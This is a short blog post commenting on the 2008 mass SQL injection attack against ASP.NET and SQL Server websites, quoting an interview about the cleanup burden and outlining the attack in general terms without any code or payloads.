 |
(George P. Alexander Jr.) I was catching up with my feeds and took note of Defence In Depth's Robert Vamosi's interview with Jeremiah Grossman from WhiteHat Security on April's mass SQL Injection attack carried out on IIS web sites that ran with SQL Server as backend . What caught my attention was the fact that so far, attackers would go for specific sites. But this time around, they used a sophisticated tool that would scan the entire web for potentially weak sites running ASP.Net and therefore, quite possibly SQL Server and use a generic SQL Server feature on all those sites to wreck serious damage. The interview is an eye opener to the massive efforts required in cleaning up the effects of compromised web sites because of this hacking tool: "Where it gets worse is it's going to be the cleanup effort. The cleanup after this compromise it's going to require database administrators going back to their database and manually pulling out the infected database tables or reverting to a back up. Either way it's going to take days, weeks, and possibly months to actually clean up the code." If you remember or were aware, April '08 ended with one of the worst SQL Injection attacks on a massive scale - affecting over half a million web sites. Though April was when this exploit gained notoriety creating much shock and awe, the process started way back in January. This continued even in May. Affected sites included not just off-the mill destinations but popular government web sites from the US, UK and many other state web sites apart from organizations like the United Nations and other legit web sites. The inner workings of this attack goes as follows: hackers would look for .aspx pages that would contain query strings and load it with encoded T-SQL. |
